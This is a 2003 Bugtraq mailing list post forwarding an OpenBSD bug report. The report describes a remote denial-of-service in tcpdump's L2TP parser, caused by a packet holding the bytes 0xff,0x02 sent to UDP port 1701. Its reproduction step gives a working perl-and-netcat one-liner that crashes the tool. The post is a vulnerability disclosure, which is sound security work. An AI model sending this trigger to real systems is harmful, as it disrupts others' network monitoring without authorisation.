Bugtraq mailing list archives
Remote crash in tcpdump from OpenBSD
From: Przemyslaw Frasunek <venglin () freebsd lublin pl>
Date: Sat, 20 Dec 2003 17:25:22 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------- Original Message -------- Subject: user/3610: repetable tcpdump remote crash Resent-Date: Sat, 20 Dec 2003 08:55:02 -0700 (MST) Resent-From: gnats () cvs openbsd org (GNATS Filer) Resent-To: bugs () cvs openbsd org Date: Sat, 20 Dec 2003 16:42:25 +0100 (CET) From: venglin () freebsd lublin pl Reply-To: venglin () freebsd lublin pl To: gnats () openbsd org
Number: 3610 Category: user Synopsis: repetable tcpdump remote crash Confidential: yes Severity: critical Priority: high Responsible: bugs State: open Quarter: Keywords: Date-Required: Class: sw-bug Submitter-Id: net Arrival-Date: Sat Dec 20 15:50:02 GMT 2003 Closed-Date: Last-Modified: Originator: Przemyslaw Frasunek Release: 3.3-RELEASE Organization:
net
Environment:
System : OpenBSD 3.3 Architecture: OpenBSD.i386 Machine : i386
Description:
Sending a packet containg 0xff,0x02 bytes to port 1701/udp causes a L2TP protocol parser in tcpdump to enter an infinite loop, eating all available memory and then segfaulting. This bug also affects tcpdump in -CURRENT.
How-To-Repeat:
tcpdump -i lo0 -n udp and dst port 1701 & perl -e 'print "\xff\x02"' | nc -u localhost 1701
Fix:
Unknown, recent versions of tcpdump are immune to this problem.
Release-Note: Audit-Trail: Unformatted:
- -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * * JID: venglin () jabber atman pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE/5HfykxEnBiV4/K0RApAkAKDMw3qheVAkGu3v2EvoCoq07C8ZYgCgh9sl ZjwiNzK9di8oSMQ1XK/YF+g= =Q0AT -----END PGP SIGNATURE-----
Current thread:
- Remote crash in tcpdump from OpenBSD Przemyslaw Frasunek (Dec 20)
- Re: Remote crash in tcpdump from OpenBSD Henning Brauer (Dec 20)
- Re: Remote crash in tcpdump from OpenBSD Przemyslaw Frasunek (Dec 20)
- <Possible follow-ups>
- Re: Remote crash in tcpdump from OpenBSD mrh_tech (Dec 22)
- Re: Remote crash in tcpdump from OpenBSD Henning Brauer (Dec 20)